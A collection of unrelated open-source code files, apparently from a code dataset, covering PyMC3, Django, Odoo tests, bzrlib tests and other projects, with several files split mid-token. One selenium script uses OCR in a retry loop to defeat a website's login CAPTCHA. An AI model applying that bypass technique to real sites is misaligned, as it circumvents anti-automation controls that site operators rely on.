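card_id = "vocab-0042"  # hypothetical first CSV field of the reviewed line
record = card_id + field_sep + datetime.now().strftime(date_format) + field_sep + "+\n"
# e.g. "vocab-0042\t2012年06月01日\t+\n": line ID, timestamp, Leitner pass ('+') result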
MCGallaspy/pymc3
pymc3/examples/LKJ_correlation.py
Python
apache-2.0
1,729
0.00694
from pymc3 import * import theano.tensor as t from theano.tensor.nlinalg import matrix_inverse as inv from numpy import array, diag, linspace from numpy.random import multivariate_normal # Generate some multivariate normal data: n_obs = 1000 # Mean values: mu = linspace(0, 2, num=4) n_var = len(mu) # Standard deviations: stds = np.ones(4) / 2.0 # Correlation matrix of 4 variables: corr = array([[ 1. , 0.75, 0. , 0.15], [ 0.75, 1. , -0.06, 0.19], [ 0. , -0.06, 1. , -0.04], [ 0.15, 0.19, -0.04, 1. ]]) cov_matrix = diag(stds).dot(corr.dot(diag(stds))) dataset = multivariate_normal(mu, cov_matrix, size=n_obs) # In order to convert the upper triangular correlation values to a complete # correlation matrix, we need to construct an index matrix: n_elem = n_var * (n_var - 1) / 2 tri_index = np.zeros([n_var, n_var], dtype=int) tri_index[np.triu_indices(n_var, k=1)] = np.arange(n_elem) tri_index[np.triu_indices(n_var, k=1)[::-1]] = np.arange(n_elem) with Model() as model: mu = Normal('mu', mu=0, tau=1 ** -2, shape=n_var) # We can specify separate priors for sigma and the correlation matrix: sigma = Uniform('sigma', shape=n_var) corr_triangle = LKJCorr('corr
', n=1, p=n_var) corr_matrix = corr_triangle[tri_index] corr_matrix = t.fill_diagonal(corr_matrix, 1) cov_matrix = t.diag(sigma).dot(corr_matrix.dot(t.diag(sigma))) like = MvNormal('likelihood', mu=mu, tau=inv(cov_matrix), observed=dataset) def run(n=1000): if n == "short": n = 50 with model: start = find_MAP() step = NUTS(scaling=start) tr = sample(n, step=step, start=start) if __name_
_ == '__main__': run()
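A standalone check of the tri_index trick above: fancy indexing expands the six upper-triangle values into a symmetric 4x4 matrix whose diagonal still needs fill_diagonal afterwards (numpy only; values are stand-ins):

import numpy as np

n_var = 4
n_elem = n_var * (n_var - 1) // 2                  # 6 off-diagonal entries
tri_index = np.zeros([n_var, n_var], dtype=int)
tri_index[np.triu_indices(n_var, k=1)] = np.arange(n_elem)
tri_index[np.triu_indices(n_var, k=1)[::-1]] = np.arange(n_elem)

vals = np.arange(10, 16)                           # stand-ins for LKJCorr draws
full = vals[tri_index]
assert (full == full.T).all()                      # off-diagonals are symmetric
assert (np.diag(full) == vals[0]).all()            # why t.fill_diagonal(..., 1) follows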
prasannav7/ggrc-core
src/ggrc/models/revision.py
Python
apache-2.0
4,093
0.008063
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file> # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> # Created By: vraj@reciprocitylabs.com # Maintained By: vraj@reciprocitylabs.com """Defines a Revision model for storing snapshots.""" from ggrc import db from ggrc.models.computed_property import computed_property from ggrc.models.mixins import Base from ggrc.models.types import JsonType class Revision(Base, db.Model): """Revision object holds a JSON snapshot of the object at a time.""" __tablename__ = 'revisions' resource_id = db.Column(db.Integer, nullable=False) resource_type = db.Column(db.String, nullable=False) event_id = db.Column(db.Integer, db.ForeignKey('events.id'), nullable=False) action = db.Column(db.Enum(u'created', u'modified', u'deleted'), nullable=False) content = db.Column(JsonType, nullable=False) source_type = db.Column(db.String, nullable=True) source_id = db.Column(db.Integer, nullable=True) destination_type = db.Column(db.String, nullable=True) destination_id = db.Column(db.Integer, nullable=True) @staticmethod def _extra_table_args(_): return (db.Index('revisions_modified_by', 'modified_by_id'),) _publish_attrs = [ 'resource_id', 'resource_type', 'source_type', 'source_id', 'destination_type', 'destination_id', 'action', 'content', 'description', ] @classmethod def eager_query(cls): from sqlalchemy import orm query = super(Revision, cls).eager_query() return query.options( orm.subqueryload('modified_by'), orm.subqueryload('event'), # used in description ) def __init__(self, obj, modified_by_id, action, content): self.resource_id = obj.id self.modified_by_id = modified_by_id self.resource_type = str(obj.__class__.__name__) self.action = action self.content = content for attr in ["source_type", "source_id", "destination_type", "destination_id"]: setattr(self, attr, getattr(obj, attr, None)) def _description_mapping(self, link_objects): """Compute description for revisions with <-> in display name.""" display_name = self.cont
ent['display_name'] source, destination = display_name.split('<->')[:2] mapping_verb = "linked" if self.resource_type in link_objects else "mapped" if self.action == 'created': result = u"{1} {2} to {0}".format(source, destination, mapping_verb) elif self.action == 'deleted': result = u"{1} un{2} from {0}".format(source, destination, mapping_verb) else:
result = u"{0} {1}".format(display_name, self.action) return result @computed_property def description(self): """Compute a human readable description from action and content.""" link_objects = ['ObjectDocument'] if 'display_name' not in self.content: return '' display_name = self.content['display_name'] if not display_name: result = u"{0} {1}".format(self.resource_type, self.action) elif u'<->' in display_name: result = self._description_mapping(link_objects) else: if 'mapped_directive' in self.content: # then this is a special case of combined map/creation # should happen only for Section and Control mapped_directive = self.content['mapped_directive'] if self.action == 'created': result = u"New {0}, {1}, created and mapped to {2}".format( self.resource_type, display_name, mapped_directive ) elif self.action == 'deleted': result = u"{0} unmapped from {1} and deleted".format( display_name, mapped_directive) else: result = u"{0} {1}".format(display_name, self.action) else: # otherwise, it's a normal creation event result = u"{0} {1}".format(display_name, self.action) if self.event.action == "IMPORT": result += ", via spreadsheet import" return result
shafiquejamal/socialassistanceregistry
nr/nr/settings/testinserver.py
Python
bsd-3-clause
88
0.011364
f
rom .base import * DEBUG = True EMAIL_BACKEND = 'nr.sendmailemailbackend.EmailBackend'
lipis/the-smallest-creature
main/api/v1/song.py
Python
mit
1,226
0.006525
# coding: utf-8 from google.appengine.ext import ndb from flask.ext import restful import flask from api import helpers impo
rt auth import model import util from main import api_v1 ############################################################################### # Admin ############################################################################### @api_v1.resource('/admin/song/', endpoint='api.admin.song.list') class AdminSongListAPI(restful.Resource): @auth.admin_required def get(self): song_keys
= util.param('song_keys', list) if song_keys: song_db_keys = [ndb.Key(urlsafe=k) for k in song_keys] song_dbs = ndb.get_multi(song_db_keys) return helpers.make_response(song_dbs, model.song.FIELDS) song_dbs, song_cursor = model.Song.get_dbs() return helpers.make_response(song_dbs, model.Song.FIELDS, song_cursor) @api_v1.resource('/admin/song/<string:song_key>/', endpoint='api.admin.song') class AdminSongAPI(restful.Resource): @auth.admin_required def get(self, song_key): song_db = ndb.Key(urlsafe=song_key).get() if not song_db: helpers.make_not_found_exception('song %s not found' % song_key) return helpers.make_response(song_db, model.Song.FIELDS)
ovnicraft/server-tools
module_auto_update/tests/test_module_deprecated.py
Python
agpl-3.0
8,365
0
# -*- coding: utf-8 -*- # Copyright 2017 LasLabs Inc. # License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl). import os import mock from odoo.modules import get_module_path from odoo.tests.common import TransactionCase from odoo.tools import mute_logger from odoo.addons.module_auto_update.addon_hash import addon_hash from ..models.module_deprecated import PARAM_DEPRECATED model = 'odo
o.addons.module_auto_update.models.module' class EndTestE
xception(Exception): pass class TestModule(TransactionCase): def setUp(self): super(TestModule, self).setUp() module_name = 'module_auto_update' self.env["ir.config_parameter"].set_param(PARAM_DEPRECATED, "1") self.own_module = self.env['ir.module.module'].search([ ('name', '=', module_name), ]) self.own_dir_path = get_module_path(module_name) keep_langs = self.env['res.lang'].search([]).mapped('code') self.own_checksum = addon_hash( self.own_dir_path, exclude_patterns=['*.pyc', '*.pyo', '*.pot', 'static/*'], keep_langs=keep_langs, ) self.own_writeable = os.access(self.own_dir_path, os.W_OK) @mock.patch('%s.get_module_path' % model) def create_test_module(self, vals, get_module_path_mock): get_module_path_mock.return_value = self.own_dir_path test_module = self.env['ir.module.module'].create(vals) return test_module def test_store_checksum_installed_state_installed(self): """It should set the module's checksum_installed equal to checksum_dir when vals contain a ``latest_version`` str.""" self.own_module.checksum_installed = 'test' self.own_module._store_checksum_installed({'latest_version': '1.0'}) self.assertEqual( self.own_module.checksum_installed, self.own_module.checksum_dir, ) def test_store_checksum_installed_state_uninstalled(self): """It should clear the module's checksum_installed when vals contain ``"latest_version": False``""" self.own_module.checksum_installed = 'test' self.own_module._store_checksum_installed({'latest_version': False}) self.assertIs(self.own_module.checksum_installed, False) def test_store_checksum_installed_vals_contain_checksum_installed(self): """It should not set checksum_installed to False or checksum_dir when a checksum_installed is included in vals""" self.own_module.checksum_installed = 'test' self.own_module._store_checksum_installed({ 'state': 'installed', 'checksum_installed': 'test', }) self.assertEqual( self.own_module.checksum_installed, 'test', 'Providing checksum_installed in vals did not prevent overwrite', ) def test_store_checksum_installed_with_retain_context(self): """It should not set checksum_installed to False or checksum_dir when self has context retain_checksum_installed=True""" self.own_module.checksum_installed = 'test' self.own_module.with_context( retain_checksum_installed=True, )._store_checksum_installed({'state': 'installed'}) self.assertEqual( self.own_module.checksum_installed, 'test', 'Providing retain_checksum_installed context did not prevent ' 'overwrite', ) @mock.patch('%s.get_module_path' % model) def test_button_uninstall_no_recompute(self, module_path_mock): """It should not attempt update on `button_uninstall`.""" module_path_mock.return_value = self.own_dir_path vals = { 'name': 'module_auto_update_test_module', 'state': 'installed', } test_module = self.create_test_module(vals) test_module.checksum_installed = 'test' uninstall_module = self.env['ir.module.module'].search([ ('name', '=', 'web'), ]) uninstall_module.button_uninstall() self.assertNotEqual( test_module.state, 'to upgrade', 'Auto update logic was triggered during uninstall.', ) def test_button_immediate_uninstall_no_recompute(self): """It should not attempt update on `button_immediate_uninstall`.""" uninstall_module = self.env['ir.module.module'].search([ ('name', '=', 'web'), ]) try: mk = mock.MagicMock() uninstall_module._patch_method('button_uninstall', mk) mk.side_effect = EndTestException with self.assertRaises(EndTestException): uninstall_module.button_immediate_uninstall() finally: uninstall_module._revert_method('button_uninstall') def 
test_button_uninstall_cancel(self): """It should preserve checksum_installed when cancelling uninstall""" self.own_module.write({'state': 'to remove'}) self.own_module.checksum_installed = 'test' self.own_module.button_uninstall_cancel() self.assertEqual( self.own_module.checksum_installed, 'test', 'Uninstall cancellation does not preserve checksum_installed', ) def test_button_upgrade_cancel(self): """It should preserve checksum_installed when cancelling upgrades""" self.own_module.write({'state': 'to upgrade'}) self.own_module.checksum_installed = 'test' self.own_module.button_upgrade_cancel() self.assertEqual( self.own_module.checksum_installed, 'test', 'Upgrade cancellation does not preserve checksum_installed', ) def test_create(self): """It should call _store_checksum_installed method""" _store_checksum_installed_mock = mock.MagicMock() try: self.env['ir.module.module']._patch_method( '_store_checksum_installed', _store_checksum_installed_mock, ) vals = { 'name': 'module_auto_update_test_module', 'state': 'installed', } self.create_test_module(vals) _store_checksum_installed_mock.assert_called_once_with(vals) finally: self.env['ir.module.module']._revert_method( '_store_checksum_installed', ) @mute_logger("openerp.modules.module") @mock.patch('%s.get_module_path' % model) def test_get_module_list(self, module_path_mock): """It should change the state of modules with different checksum_dir and checksum_installed to 'to upgrade'""" module_path_mock.return_value = self.own_dir_path vals = { 'name': 'module_auto_update_test_module', 'state': 'installed', } test_module = self.create_test_module(vals) test_module.checksum_installed = 'test' self.env['base.module.upgrade'].get_module_list() self.assertEqual( test_module.state, 'to upgrade', 'List update does not mark upgradeable modules "to upgrade"', ) @mock.patch('%s.get_module_path' % model) def test_get_module_list_only_changes_installed(self, module_path_mock): """It should not change the state of a module with a former state other than 'installed' to 'to upgrade'""" module_path_mock.return_value = self.own_dir_path vals = { 'name': 'module_auto_update_test_module', 'state': 'uninstalled', } test_module = self.create_test_module(vals) self.env['base.module.upgrade'].get_module_list() self.assertNotEqual( test_module.state, 'to upgrade', 'List update changed state of an uninstalled module', ) def test_write(self): """It should call _store_checksum_installed method""" _store_checksum_installed_mock = mock.MagicMock() self.env['ir.module.module']._patch_method( '_store_checksum_installed', _store_checksum_installed_mock, ) vals = {'state': 'installed'} self.own_module.
alerta/python-alerta
alertaclient/commands/cmd_notes.py
Python
mit
1,034
0.004836
import json import click from tabulate import tabulate @click.command('notes', short_help='List notes') @click.option('--alert-id', '-i', metavar='UUID', help='alert IDs (can use short 8-char id)') @click.pass_obj def cli(obj, alert_id): """List notes.""" client = obj['client'] if alert_id: if obj['output'] == 'json': r = client.http.get('/alert/{}/notes'.format(alert_id)) click.echo(json.dumps(r['notes'], sort_keys=True, indent=4, ensure_ascii=False)) else: timezone = obj['timezone'] headers = { 'id': 'NOTE ID', 'text': 'NOTE', 'user': 'USER', 'type': 'TYPE', 'attributes': 'ATTRIBUTES', 'createTime': 'CREATED', 'updateTime': 'UPDATED', 'related': 'RELATED ID', 'customer': 'CUSTOMER' }
click.echo(tabulate([n.tabular(timezone) for n in client.get_alert_notes(ale
rt_id)], headers=headers, tablefmt=obj['output'])) else: raise click.UsageError('Need "--alert-id" to list notes.')
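As a side note, the table rendering above boils down to a plain `tabulate` call; a minimal sketch with made-up note rows standing in for the `n.tabular(timezone)` results (the ids, texts, and timestamps below are invented for illustration):

from tabulate import tabulate

# Invented rows in the shape the command prints: id, text, user, type, created.
rows = [
    ['f1a2b3c4', 'checked with ops', 'admin', 'note', '2021-06-01 10:00'],
    ['d5e6f7a8', 'auto-resolved', 'system', 'note', '2021-06-01 10:05'],
]
headers = ['NOTE ID', 'NOTE', 'USER', 'TYPE', 'CREATED']

# tablefmt plays the role of obj['output'] in the command above.
print(tabulate(rows, headers=headers, tablefmt='psql'))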
1065865483/0python_script
test/imag_test.py
Python
mit
3,355
0.001257
# -*- coding: utf-8 -*- # CAPTCHA recognition with python+selenium import re import requests import pytesseract from selenium import webdriver from PIL import Image, ImageEnhance import time driver = webdriver.Chrome() driver.maximize_window() driver.get("https://higo.flycua.com/hp/html/login.html") driver.implicitly_wait(30) # the username and password below are my personal information, so they are hidden driver.find_element_by_name('memberId').send_keys('xxxxxx') driver.find_element_by_name('password').send_keys('xxxxxx') # the CAPTCHA is rarely recognized correctly on the first try, so keep looping until login succeeds while True: # clear the CAPTCHA input box; it may still hold a previously mis-recognized code driver.find_element_by_name("verificationCode").clear() # path where the screenshot / CAPTCHA image is saved screenImg = r"H:\s
creenImg.png" # take a screenshot of the whole browser page driver.get_screenshot_as_file(screenImg) # locate the position and size of the CAPTCHA element location = driver.find_element_by_name('authImage').location size = driver.find_element_by_name('authImage').size # the offsets in the next four lines should in theory be unnecessary, but without them the crop misses the CAPTCHA area; check the saved screenshot and adjust them to match left = location['x'] + 530
top = location['y'] + 175 right = location['x'] + size['width'] + 553 bottom = location['y'] + size['height'] + 200 # re-read the screenshot from disk, crop out the CAPTCHA area and save it again img = Image.open(screenImg).crop((left, top, right, bottom)) # the processing below makes the image easier to recognize; see the PIL docs for details img = img.convert('RGBA') # convert mode: L | RGB img = img.convert('L') # convert mode: L | RGB img = ImageEnhance.Contrast(img) # build a contrast enhancer img = img.enhance(2.0) # apply contrast factor 2.0 img.save(screenImg) # read the image back and run the OCR img = Image.open(screenImg) code = pytesseract.image_to_string(img) # print the raw recognized CAPTCHA # print(code.strip()) # strip special characters from the recognized CAPTCHA with a regular expression; this was my first time using one, so it may be crude b = '' for i in code.strip(): pattern = re.compile(r'[a-zA-Z0-9]') m = pattern.search(i) if m is not None: b += i # print the CAPTCHA after removing special characters print(b) # type the value of b into the CAPTCHA input box driver.find_element_by_name("verificationCode").send_keys(b) # click the login button driver.find_element_by_class_name('login-form-btn-submit').click() # wait 5 seconds; if the CAPTCHA was wrong the site shows an error and makes you wait before the next attempt time.sleep(5) # get the cookies and convert them to a string cookie1 = str(driver.get_cookies()) print(cookie1) # second regular expression, equally crude: check whether the cookie string contains "tokenId"; if it does, login succeeded, so break out of the loop and continue with the rest of the automation, otherwise login failed and we recognize the CAPTCHA again matchObj = re.search(r'tokenId', cookie1, re.M | re.I) if matchObj: print(matchObj.group()) break else: print("No match!!") print('done')
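For reference, a minimal standalone sketch of the crop / convert / contrast / OCR pipeline the script above performs, decoupled from the Selenium session. The file name and crop box below are placeholders, not values taken from the original script:

import re

from PIL import Image, ImageEnhance
import pytesseract


def read_captcha(screenshot_path, box):
    """Crop the CAPTCHA area out of a full-page screenshot and OCR it."""
    img = Image.open(screenshot_path).crop(box)    # box = (left, top, right, bottom)
    img = img.convert('L')                         # greyscale usually helps tesseract
    img = ImageEnhance.Contrast(img).enhance(2.0)  # boost contrast, as above
    text = pytesseract.image_to_string(img)
    return re.sub(r'[^a-zA-Z0-9]', '', text)       # keep alphanumerics only


# Hypothetical path and crop box; adjust to the actual screenshot.
print(read_captcha('screenshot.png', (530, 175, 650, 215)))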
Distrotech/bzr
bzrlib/tests/test_bzrdir.py
Python
gpl-2.0
68,233
0.001597
# Copyright (C) 2006-2011 Canonical Ltd # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA """Tests for the BzrDir facility and any format specific tests. For interface contract tests, see tests/per_bzr_dir. """ import os import subprocess import sys from bzrlib import ( branch, bzrdir, config, controldir, errors, help_topics, lock, repository, revision as _mod_revision, osutils, remote, transport as _mod_transport, urlutils, win32utils, workingtree_3, workingtree_4, ) import bzrlib.branch from bzrlib.branchfmt.fullhistory import BzrBranchFormat5 from bzrlib.errors import ( NotBranchError, NoColocatedBranchSupport, UnknownFormatError, UnsupportedFormatError, ) from bzrlib.tests import ( TestCase, TestCaseWithMemoryTransport, TestCaseWithTransport, TestSkipped, ) from bzrlib.tests import( http_server, http_utils, ) from bzrlib.tests.test_http import TestWithTransport_pycurl from bzrlib.transport import ( memory, pathfilter, ) from bzrlib.transport.http._urllib import HttpTransport_urllib from bzrlib.transport.nosmart import NoSmartTransportDecorator from bzrlib.transport.readonly import ReadonlyTransportDecorator from bzrlib.repofmt import knitrepo, knitpack_repo class TestDefaultFormat(TestCase): def test_get_set_default_format(self): old_format = bzrdir.BzrDirFormat.get_default_format() # default is BzrDirMetaFormat1 self.assertIsInstance(old_format, bzrdir.BzrDirMetaFormat1) controldir.ControlDirFormat._set_default_format(SampleBzrDirFormat()) # creating a bzr dir should now create an instrumented dir. try: result = bzrdir.BzrDir.create('memory:///') self.assertIsInstance(result, SampleBzrDir) finally: controldir.ControlDirFormat._set_default_format(old_format) self.assertEqual(old_format, bzrdir.BzrDirFormat.get_default_format()) class DeprecatedBzrDirFormat(bzrdir.BzrDirFormat): """A deprecated bzr dir format.""" class TestFormatRegistry(TestCase): def make_format_registry(self): my_format_registry = controldir.ControlDirFormatRegistry() my_format_registry.register('deprecated', DeprecatedBzrDirFormat, 'Some format. Slower and unawesome and deprecated.', deprecated=True) my_format_registry.register_lazy('lazy', 'bzrlib.tests.test_bzrdir', 'DeprecatedBzrDirFormat', 'Format registered lazily', deprecated=True) bzrdir.register_metadir(my_format_registry, 'knit', 'bzrlib.repofmt.knitrepo.RepositoryFormatKnit1',
'Format using knits', ) my_format_registry.set_default('knit')
bzrdir.register_metadir(my_format_registry, 'branch6', 'bzrlib.repofmt.knitrepo.RepositoryFormatKnit3', 'Experimental successor to knit. Use at your own risk.', branch_format='bzrlib.branch.BzrBranchFormat6', experimental=True) bzrdir.register_metadir(my_format_registry, 'hidden format', 'bzrlib.repofmt.knitrepo.RepositoryFormatKnit3', 'Experimental successor to knit. Use at your own risk.', branch_format='bzrlib.branch.BzrBranchFormat6', hidden=True) my_format_registry.register('hiddendeprecated', DeprecatedBzrDirFormat, 'Old format. Slower and does not support things. ', hidden=True) my_format_registry.register_lazy('hiddenlazy', 'bzrlib.tests.test_bzrdir', 'DeprecatedBzrDirFormat', 'Format registered lazily', deprecated=True, hidden=True) return my_format_registry def test_format_registry(self): my_format_registry = self.make_format_registry() my_bzrdir = my_format_registry.make_bzrdir('lazy') self.assertIsInstance(my_bzrdir, DeprecatedBzrDirFormat) my_bzrdir = my_format_registry.make_bzrdir('deprecated') self.assertIsInstance(my_bzrdir, DeprecatedBzrDirFormat) my_bzrdir = my_format_registry.make_bzrdir('default') self.assertIsInstance(my_bzrdir.repository_format, knitrepo.RepositoryFormatKnit1) my_bzrdir = my_format_registry.make_bzrdir('knit') self.assertIsInstance(my_bzrdir.repository_format, knitrepo.RepositoryFormatKnit1) my_bzrdir = my_format_registry.make_bzrdir('branch6') self.assertIsInstance(my_bzrdir.get_branch_format(), bzrlib.branch.BzrBranchFormat6) def test_get_help(self): my_format_registry = self.make_format_registry() self.assertEqual('Format registered lazily', my_format_registry.get_help('lazy')) self.assertEqual('Format using knits', my_format_registry.get_help('knit')) self.assertEqual('Format using knits', my_format_registry.get_help('default')) self.assertEqual('Some format. Slower and unawesome and deprecated.', my_format_registry.get_help('deprecated')) def test_help_topic(self): topics = help_topics.HelpTopicRegistry() registry = self.make_format_registry() topics.register('current-formats', registry.help_topic, 'Current formats') topics.register('other-formats', registry.help_topic, 'Other formats') new = topics.get_detail('current-formats') rest = topics.get_detail('other-formats') experimental, deprecated = rest.split('Deprecated formats') self.assertContainsRe(new, 'formats-help') self.assertContainsRe(new, ':knit:\n \(native\) \(default\) Format using knits\n') self.assertContainsRe(experimental, ':branch6:\n \(native\) Experimental successor to knit') self.assertContainsRe(deprecated, ':lazy:\n \(native\) Format registered lazily\n') self.assertNotContainsRe(new, 'hidden') def test_set_default_repository(self): default_factory = controldir.format_registry.get('default') old_default = [k for k, v in controldir.format_registry.iteritems() if v == default_factory and k != 'default'][0] controldir.format_registry.set_default_repository('dirstate-with-subtree') try: self.assertIs(controldir.format_registry.get('dirstate-with-subtree'), controldir.format_registry.get('default')) self.assertIs( repository.format_registry.get_default().__class__, knitrepo.RepositoryFormatKnit3) finally: controldir.format_registry.set_default_repository(old_default) def test_aliases(self): a_registry = controldir.ControlDirFormatRegistry() a_registry.register('deprecated', DeprecatedBzrDirFormat, 'Old format. Slower and does not support stuff', deprecated=True) a_registry.register('deprecatedalias', DeprecatedBzrDirFormat, 'Old format. 
Slower and does not support stuff', deprecated=True, alias=True) self.assertEqual(frozenset(['deprecatedalias']), a_registry.aliases()) class SampleBranch(bzrlib.branch.Branch): """A dummy branch for guess what, dummy use.""" def __init__(self, dir): self.bzrdir =
GeorgiaTechDHLab/TOME
news/migrations/0004_auto_20170307_0605.py
Python
bsd-3-clause
1,746
0.004009
# -*- coding: utf-8 -*- # Generated by Django 1.10.5 on 2017-03-07 06:05 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('news', '0003_auto_20170228_2249'), ] operations = [ migrations.CreateModel( name='Location', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('city', models.CharField(default='Testville', max_length=200)), ('state', models.CharField(default='Montigania', max_length=200)), ], ), migrations.AddField( model_name='newspaper', name='next_paper', field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='news.Newspaper'), ), migrations.AddField( model_name='newspaper', name='prev_paper',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='news.Newspaper'), ), migrations.AlterField( model_name='newspaper', name='date_ended', field=models.DateField(blank=True, null=True, verbose_name='date ended'), ), migrations.AlterUniqueTogether( name='location', unique_together=set([('city', 'state')]), ), migrations.AddField(
model_name='newspaper', name='location', field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='news.Location'), ), ]
Bismarrck/pymatgen
pymatgen/io/aseio.py
Python
mit
594
0.003367
# coding: utf-8 # Copyright (c) Pymatgen Development Team. # Distributed under the terms of the MIT License. #!/usr/bin/env python from __future__ i
mport division, unicode_literals """ #TODO: Write module doc. """ __author__ = 'Shyue Ping Ong' __copyright__ = 'Copyright 2013, The Materials Virtual Lab' __version__ = '0.1' __maintainer__ = 'Shyue Ping Ong' __email_
_ = 'ongsp@ucsd.edu' __date__ = '8/1/15' import warnings warnings.warn("pymatgen.io.aseio has been moved to pymatgen.io.ase. This stub " "will be removed in pymatgen 4.0.", DeprecationWarning) from .ase import *
jlanga/exfi
tests/test_io/test_read_gfa.py
Python
mit
2,975
0.000672
#!/usr/bin/env python3 """tests.test_io.test_read_gfa.py: tests for exfi.io.read_gfa.py""" from unittest import TestCase, main from exfi.io.read_gfa import read_gfa1 from tests.io.gfa1 import \ HEADER, \ SEGMENTS_EMPTY, SEGMENTS_SIMPLE, SEGMENTS_COMPLEX, \ SEGMENTS_COMPLEX_SOFT, SEGMENTS_COMPLEX_HARD, \ LINKS_EMPTY, LINKS_SIMPLE, LINKS_COMPLEX, \ CONTAINMENTS_EMPTY, CONTAINMENTS_SIMPLE, CONTAINMENTS_COMPLEX, \ PATHS_EMPTY, PATHS_SIMPLE, PATHS_COMPLEX, \ GFA1_EMPTY_FN, GFA1_SIMPLE_FN, GFA1_COMPLEX_FN, \ GFA1_COMPLEX_SOFT_FN, GFA1_COM
PLE
X_HARD_FN class TestReadGFA1(TestCase): """Tests for exfi.io.read_gfa.read_gfa1""" def test_empty(self): """exfi.io.read_gfa.read_gfa1: empty case""" gfa1 = read_gfa1(GFA1_EMPTY_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_EMPTY)) self.assertTrue(gfa1['links'].equals(LINKS_EMPTY)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_EMPTY)) self.assertTrue(gfa1['paths'].equals(PATHS_EMPTY)) def test_simple(self): """exfi.io.read_gfa.read_gfa1: simple case""" gfa1 = read_gfa1(GFA1_SIMPLE_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_SIMPLE)) self.assertTrue(gfa1['links'].equals(LINKS_SIMPLE)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_SIMPLE)) self.assertTrue(gfa1['paths'].equals(PATHS_SIMPLE)) def test_complex(self): """exfi.io.read_gfa.read_gfa1: complex case""" gfa1 = read_gfa1(GFA1_COMPLEX_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX)) self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX)) self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX)) def test_complex_soft(self): """exfi.io.read_gfa.read_gfa1: complex and soft masking case""" gfa1 = read_gfa1(GFA1_COMPLEX_SOFT_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX_SOFT)) self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX)) self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX)) def test_complex_hard(self): """exfi.io.read_gfa.read_gfa1: complex and hard masking case""" gfa1 = read_gfa1(GFA1_COMPLEX_HARD_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX_HARD)) self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX)) self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX)) if __name__ == '__main__': main()
nextgis/nextgisweb_compulink
nextgisweb_compulink/db_migrations/update_actual_lyr_names.py
Python
gpl-2.0
1,646
0.003645
# coding=utf-8 import json import codecs import os import transaction from nextgisweb import DBSession from nextgisweb.vector_layer import VectorLayer from nextgisweb_compulink.compulink_admin.model import BASE_PATH def update_actual_lyr_names(args): db_session = DBSession() transaction.manager.begin() # what update upd_real_layers = ['real_access_point', 'real_fosc', 'real_optical_cable', 'real_optical_cable_point', 'real_optical_cross', 'real_special_transition', 'real_special_transition_point'] upd_real_lyr_names = {
} # new names (already in templates!) real_layers_template_path = os.path.join(BASE_PATH, 'real_layers_templates/') for up_lyr_name in upd_real_layers: with codecs.open(os.path.join(real_layers_template_path, up_lyr_name + '.json'), encoding='utf-8') as json_file: json_layer_struct = json.load(json_file, encoding='utf-8') new_name = json_layer_struct['resource']['display_name']
upd_real_lyr_names[up_lyr_name] = new_name # update now resources = db_session.query(VectorLayer).filter(VectorLayer.keyname.like('real_%')).all() for vec_layer in resources: lyr_name = vec_layer.keyname if not lyr_name: continue for up_lyr_name in upd_real_lyr_names.keys(): if lyr_name.startswith(up_lyr_name) and not lyr_name.startswith(up_lyr_name + '_point'): # ugly! vec_layer.display_name = upd_real_lyr_names[up_lyr_name] print '%s updated' % lyr_name break transaction.manager.commit() db_session.close()
schleichdi2/OPENNFR-6.3-CORE
opennfr-openembedded-core/meta/lib/oeqa/sdk/cases/gcc.py
Python
gpl-2.0
1,658
0.009047
# # SPDX-License-Identifier: MIT # import os import shutil import unittest from oeqa.core.utils.path import remove_safe from oeqa.sdk.case import OESDKTestCase from oeqa.utils.subprocesstweak import errors_have_output errors_have_output() class GccCompileTest(OESDKTestCase): td_vars = ['MACHINE'] @classmethod def setUpClass(self): files = {'test.c' : self.tc.files_dir,
'test.cpp' : self.tc.files_dir, 'testsdkmakefile' : self.tc.sdk_files_dir} for f in files: shutil.copyfile(os.path.join(files[f], f), os.path.join(self.tc.sdk_dir, f)) def setUp(self): machine = self.td.get("MACHINE") if not (self.tc.hasHostPackage("packagegroup-cross-canadian-%s" % machine) or self.tc.hasHostPackage("^gcc-", regex=True)):
